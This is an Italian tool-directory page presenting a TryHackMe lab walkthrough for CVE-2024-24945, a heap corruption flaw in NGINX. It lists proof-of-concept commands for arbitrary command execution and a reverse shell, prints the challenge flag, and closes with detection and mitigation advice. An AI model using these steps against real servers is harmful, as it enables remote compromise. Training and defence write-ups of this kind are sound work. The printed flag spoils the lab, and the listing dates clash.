Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Questo laboratorio dimostra lo sfruttamento di CVE-2024-24945, una vulnerabilità di corruzione dell'heap che colpisce NGINX. L'obiettivo era comprendere come la corruzione della memoria possa portare all'esecuzione remota di codice (RCE) e acquisire esperienza pratica nelle tecniche di sfruttamento, rilevamento e mitigazione. | Kitploit
Strumenti/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneBinary ExploitationLab e Pratica
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Vedi Repository
42 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo laboratorio dimostra lo sfruttamento di CVE-2024-24945, una vulnerabilità di corruzione dell'heap che colpisce NGINX. L'obiettivo era comprendere come la corruzione della memoria possa portare all'esecuzione remota di codice (RCE) e acquisire esperienza pratica nelle tecniche di sfruttamento, rilevamento e mitigazione.

Condividi

CVE-2024-24945-NGINX-RIFT---TryHackMe-Procedura Dettagliata del Laboratorio

Questo laboratorio dimostra lo sfruttamento di CVE-2024-24945, una vulnerabilità di corruzione dell'heap che colpisce NGINX. L'obiettivo era comprendere come la corruzione della memoria possa portare all'esecuzione remota di codice (RCE) e acquisire esperienza pratica nelle tecniche di sfruttamento, rilevamento e mitigazione.

Obiettivi

. Verificare il servizio NGINX vulnerabile. . Eseguire comandi arbitrari utilizzando il proof of concept (PoC) fornito. . Ottenere una reverse shell sul container di destinazione. . Recuperare la flag della challenge. . Comprendere le strategie di rilevamento e mitigazione.

Ambiente del Laboratorio

. Piattaforma: TryHackMe . Servizio Target: NGINX RIFT . Ambiente Containerizzato: Docker . Strumento Exploit: poc.py . Metodo di Accesso: VNC (Virtual Network Computing)

Metodologia

  1. Verifica del Servizio

  2. confermato che il container vulnerabile era in esecuzione e accessibile.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ok

  1. Esecuzione Remota di Codice

Eseguito il PoC fornito per convalidare l'esecuzione di comandi arbitrari.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Verificata l'esecuzione riuscita:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Output: hello from depthfirst

Accesso Reverse Shell

Stabilire una shell interattiva sul container di destinazione.

root@kitploit:~
python3 poc.py --shell

Connessione Riuscita:

[] listening for reverse shell on port 1337... [] connected. $

  1. Recupero della Flag

Accesso alla flag della challenge.

root@kitploit:~
cat /flag.txt

Flag:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Opportunità di Rilevamento

I difensori possono identificare tentativi di sfruttamento attraverso:

. Crash del worker NGINX . Eventi di segmentation fault . Connessioni di rete in uscita inaspettate . Processi shell sospetti (/bin/sh, bash) . Creazione non autorizzata di file in directory temporanee

Strategie di Mitigazione

. Aggiornare a una versione di NGINX patchata. . Applicare il principio del minimo privilegio. . Limitare il traffico di rete in uscita non necessario. . Implementare il monitoraggio continuo dei log. . Utilizzare controlli di sicurezza dei container e monitoraggio runtime.

Punti Chiave

Questo laboratorio ha fornito esperienza pratica in:

. Comprensione delle vulnerabilità di corruzione dell'heap. . Sfruttamento di vulnerabilità di esecuzione remota di codice. . Stabilire reverse shell. . Esecuzione della convalida post-sfruttamento. . Riconoscimento degli indicatori di compromissione e delle tecniche di mitigazione.

Dichiarazione di esclusione di responsabilità

Questo esercizio è stato eseguito in un ambiente di laboratorio controllato di TryHackMe esclusivamente a scopo di formazione educativa e difensiva sulla cybersecurity.

Autore: [Benedict Ejepu Amaechi] Piattaforma: TryHackMe Argomento: CVE-2024-24945 9NGINX RIFT0 Sfruttamento e Difesa Data di Completamento: Giugno 2026

Scarica lo strumento